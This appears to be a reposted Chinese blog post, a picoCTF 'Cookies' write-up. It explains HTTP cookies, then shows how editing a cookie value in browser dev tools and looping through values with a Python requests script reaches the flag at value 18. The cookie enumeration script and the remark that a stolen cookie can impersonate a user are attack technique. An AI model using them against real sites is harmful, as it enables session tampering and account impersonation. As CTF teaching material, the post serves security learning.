当前位置: 首页 > 开发杂谈 >

[2021铁人赛 Day26] Web Exploitation Web渗透题目 02

  • 引言
    今天我们接续昨天的 web 渗透主题,继续解该系列第二题吧。

    昨天简短介绍了一些 HTTP 的请求方法,
    今天来介绍一点 Cookie ,这种饼乾到底是什麽饼乾呢?

    [摘录自维基百科: Cookie]
    Cookie(复数形态:Cookies),又称「小甜饼」。类型为「小型文字档案」,指某些网站为了辨别使用者身分而储存在用户端(Client Side)上的资料(通常经过加密)。

    我认为可以举两个例子来理解它是什麽概念:

    • 平常登入社群网站,跟朋友聊天打屁後,或许聊完後你将电脑关机了。结果,过了一个下午你又打开同个电脑、同个浏览器,你的帐号可能还是登入状态,你并没有再次输入帐号密码。
    • 有的网站可能会让使用者有一些个人化设定,例如背景颜色或清单排序方式等,在不需要登入的网站中,也能在下次你开启同个浏览器的时候继续帮你套用这些设定。

    这些功能基本上就是 Cookie 达成的,它是一种小小的文字档案,
    上面会纪录着加密过的登入资讯、个人化设定等,
    是由服务器那边在你登入、设定过後传送给你的浏览器,储存在你电脑这端的文字档案。

    所以理论上可以藉由一些方法,取得他人的 Cookie ,套用在自己浏览器上,
    让服务器误以为你是那个人,提供给你该人的登入状态。
    不过当然没那麽容易的,只是从概念上或许是有办法做到的。

  • Web Exploitation / Cookies
    https://ithelp.ithome.com.tw/upload/images/20211011/20111429TbCF1NprGR.png
    题目就直接提到了 Cookie ,并给你了一个网站,我们直接点进去吧:
    https://ithelp.ithome.com.tw/upload/images/20211011/20111429Adt1S8zQUy.png
    会有个栏位请你填入文字,该文字框的底字是 snickerdoodle ,我们直接填进去看看:
    https://ithelp.ithome.com.tw/upload/images/20211011/20111429SzhwYIMUPG.png
    会说输入成功,但是并不是特殊饼乾,可以猜到应该有个特殊饼乾,而且应该就是 flag 。
    有了头绪後,我们先按下 F12 看看页面资讯,而且其实这个功能是可以看到 Cookie 的:
    https://ithelp.ithome.com.tw/upload/images/20211011/20111429GJ8QhWDMhs.png
    先调整成我红线画的页面,可以看到 Cookie 只有一个,名称: name 、值: 0
    你可以直接修改值後再按 F5 重新整理,例如我改成 1 再重新整理後:
    https://ithelp.ithome.com.tw/upload/images/20211011/20111429r8hEp4vbDf.png
    变成巧克力脆片了!我们只要持续往上更改数字,就可以得到 flag 。
    可以直接用 Python 来写:

    import requests
    import bs4
    
    n = 0
    while True:
        try:
            r = requests.get('http://mercury.picoctf.net:54219/', cookies={'name':str(n)})
            soup = bs4.BeautifulSoup(r.text, 'html.parser')
            print(n, end=' ')
            print(soup.find(style="text-align:center; font-size:30px;").find('b').text)
            n += 1
        except requests.exceptions.ConnectionError:
            pass
    

    bs4 只是为了要找出 I love chocolate chip cookies! 这行,并非必要,
    有兴趣可以自行查询这个工具,也是非常常用的网页爬虫工具。

    主要的程序是 requests.get('xxx', cookies={'yyy':'zzz'}) 这段,
    先对服务器发出 GET 请求,然後传送 cookie 给服务器,我们就依序由 1 开始,
    传送 1, 2, 3, ... 等等,看看服务器回传什麽给我们。

    结果在第 18 号时, flag 被传送了回来!

    0 I love snickerdoodle cookies!
    1 I love chocolate chip cookies!
    2 I love oatmeal raisin cookies!
    3 I love gingersnap cookies!
    4 I love shortbread cookies!
    5 I love peanut butter cookies!
    6 I love whoopie pie cookies!
    7 I love sugar cookies!
    8 I love molasses cookies!
    9 I love kiss cookies!
    10 I love biscotti cookies!
    11 I love butter cookies!
    12 I love spritz cookies!
    13 I love snowball cookies!
    14 I love drop cookies!
    15 I love thumbprint cookies!
    16 I love pinwheel cookies!
    17 I love wafer cookies!
    18 Flag
    

    回到 Cookie 网站,将 Cookie name 的值改成 18 ,重新整理後:
    https://ithelp.ithome.com.tw/upload/images/20211011/201114297dVZMQgtXo.png


相关文章:

  • [Day29]检视表、索引
  • lazada直播之2个原则选主播
  • 影响亚马逊IPI分数的因素
  • 能有效提升谷歌广告效果的小技巧
  • [Day 10]从零开始学习 JS 的连续-30 Days---阵列与物件混合应用
  • Day7 配对条件范例 (角色,人数上限)
  • 成员 3 人:别让人落单,就成功一半
  • [Day17] Vue 3 单元测试 (Unit Testing) - Vue Test Utils + Jest 基本范例 & 核心语法
  • 安装kubeadmin
  • Day25 跟着官方文件学习Laravel-Service Container
  • [Day 29] Optimize Images
  • 哪些情况下容易在Tophatter获得差评?
  • Shopee大促期间卖家如何调整运营策略
  • Day6: [资料结构] -  Set
  • DAY2:简介Android Studio与Kotlin
  • 2020最新Google Voice号码申请方法(非脚本)
  • Gutenberg最新版如何添加导航间隔
  • 让 Rank Math SEO 输出关键词 keywords meta 字段信息
  • Google Voice怎么转移到Lycamobile
  • WordPress 调试模式基本指南
  • 简单做WordPress网站的方法:最快最便宜的做外贸网站的方法
  • 使用MailPoet扩展您的电子商务邮件列表
  • 国外靠谱的VPS云服务器大全
  • 俄取消商品知识产权限制 盗版游戏、电影等商标合法化
  • SiteGround主机评测和推荐
  • WordPress教程:教你如何置顶文章
  • Namesilo域名注册教程和域名注册流程方法
  • 移动怎么开通香港电话号码
  • 苹果手机Apple美国区账号无信用卡购买教程【Apple ID美国区绑定PayPal教程】
  • MovoCash虚拟信用卡教程:美国虚拟信用卡申请教程